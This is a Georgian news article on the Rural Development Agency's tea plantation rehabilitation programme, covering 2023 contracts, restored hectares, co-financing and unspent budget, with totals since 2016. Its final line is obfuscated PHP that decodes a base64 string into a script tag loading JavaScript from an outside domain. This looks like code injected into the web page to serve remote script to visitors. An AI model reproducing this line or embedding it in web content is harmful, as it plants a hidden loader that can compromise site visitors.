celsiusi
ავერსი საქკაბელი

სოფლის განვითარების სააგენტოს ჩაის პლანტაციების რეაბილიტაციის პროგრამით 2023 წლის 9 თვეში 3 ხელშეკრულება გაფორმდა და ჯამურად 109.05 ჰა ჩაის პლანტაცია რეაბილიტირდა. 

როგორც აგრარულ საკითხთა კომიტეტის სხდომაზე სააგენტოს დირექტორის, დავით წითლიძის, მიერ წარდგენილ ანგარიშში წერია, 2023 წლის 30 სექტემბრის მონაცემებით, მიმდინარე წელს ჩაის პლანტაციების სარეაბილიტაციო ღირებულებამ 395 565 ლარი შეადგინა, საიდანაც სააგენტოს თანადაფინანსება 272 614 ლარი, თითქმის 69% იყო.

ამავე ანგარიშის მიხედვით, სოფლის განვითარების სააგენტომ ჩაის პლანტაციების რეაბილიტაციის პროგრამისთვის 2023 წლის ბიუჯეტიდან 500 000 ლარი გამოყო, საიდანაც, 17 ოქტომბრის მონაცემებით, მხოლოდ 33,48% - 167 397 ლარია ათვისებული.

ცნობისთვის, ჩაის პლანტაციების რეაბილიტაციის პროგრამა სოფლის განვითარების სააგენტომ 2016 წელს დაიწყო. რვა წლის განმავლობაში, სააგენტომ ბენეფიციარებთან 72 ხელშეკრულება გააფორმა, საერთო სარეაბილიტაციო ფართობმა კი 1 762, 13 ჰექტარი შეადგინა.

2018 წლიდან დღემდე პროგრამის ფარგლებში აღდგენილი ჩაის პლანტაციების რეაბილიტაციის ღირებულებამ 5,2 მლნ ლარს მიაღწია, საიდანაც სახელმწიფო თანადაფინანსება 3,6 მლნ ლარი, 69.2%, იყო. 
269
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");